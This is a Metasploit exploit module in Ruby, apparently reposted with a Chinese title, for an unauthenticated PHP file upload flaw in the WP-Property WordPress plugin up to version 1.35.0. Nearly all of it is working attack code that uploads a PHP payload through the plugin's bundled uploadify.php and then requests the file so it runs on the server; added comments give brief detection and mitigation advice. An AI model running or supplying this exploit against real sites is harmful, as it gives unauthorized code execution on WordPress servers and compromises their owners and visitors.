WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
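# Framework core, plus the file that provides the PHP payload-wrapping mixin
# (msf/core/exploit/php_exe) used by the module class below.
require 'msf/core'
require 'msf/core/exploit/php_exe'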
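# Metasploit module for the unauthenticated file upload in the uploadify.php
# script bundled with the WP-Property WordPress plugin (<= 1.35.0, per the
# module description).
#
# Reviewer notes for defenders, derived from the requests this module sends:
#   * Detection: web-server logs showing a multipart POST to
#     wp-content/plugins/wp-property/third-party/uploadify/uploadify.php,
#     followed by a GET for a newly created *.php file, are the visible
#     footprint. Any .php file appearing under that uploadify directory
#     deserves investigation.
#   * Mitigation: update WP-Property past the affected range, remove or block
#     direct access to the bundled uploadify.php, and do not allow PHP
#     execution from web-writable directories.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Plugin-relative directory that holds the vulnerable upload handler.
  UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'.freeze

  # Registers module metadata (references, targets, payload constraints) and
  # the single TARGETURI option pointing at the WordPress base path.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the upload handler with a plain GET.
  #
  # Returns CheckCode::Unknown when there is no response or the status is not
  # 200, and CheckCode::Appears otherwise.
  #
  # NOTE(review): a 200 only shows that uploadify.php is reachable; neither the
  # plugin version nor the upload behaviour is verified here, so "Appears" can
  # overstate the finding. Confirm the installed plugin version before treating
  # a host as affected.
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{base_uri}#{UPLOADIFY_DIR}uploadify.php"
    })

    return Exploit::CheckCode::Unknown if res.nil? || res.code != 200

    Exploit::CheckCode::Appears
  end

  # Uploads a randomly named PHP file through uploadify.php, then requests the
  # location the server reports back so the uploaded file runs.
  #
  # Fails with Failure::UnexpectedReply when the upload response is missing,
  # is not a 200, or does not echo the uploaded file name.
  def exploit
    uri  = base_uri
    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    # Payload wrapper comes from the PhpEXE mixin; :unlink_self presumably makes
    # the dropped file delete itself once run (inferred from the option name).
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}#{UPLOADIFY_DIR}", nil, nil, "form-data; name=\"folder\"")
    # Drops the empty CRLF line that precedes a boundary marker in the
    # serialized MIME message.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}#{UPLOADIFY_DIR}uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # Literal substring test: the file name contains a '.', which would act as
    # a wildcard if the name were interpolated into a regular expression.
    if res.nil? || res.code != 200 || !res.body.to_s.include?(@payload_name)
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The handler answers with the path of the stored file.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end

  private

  # TARGETURI path with a trailing slash, built without mutating the string
  # returned by target_uri.
  def base_uri
    path = target_uri.path
    path.end_with?('/') ? path : "#{path}/"
  end
end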
不要问我这写的是什么 怎么利用 我是说msf.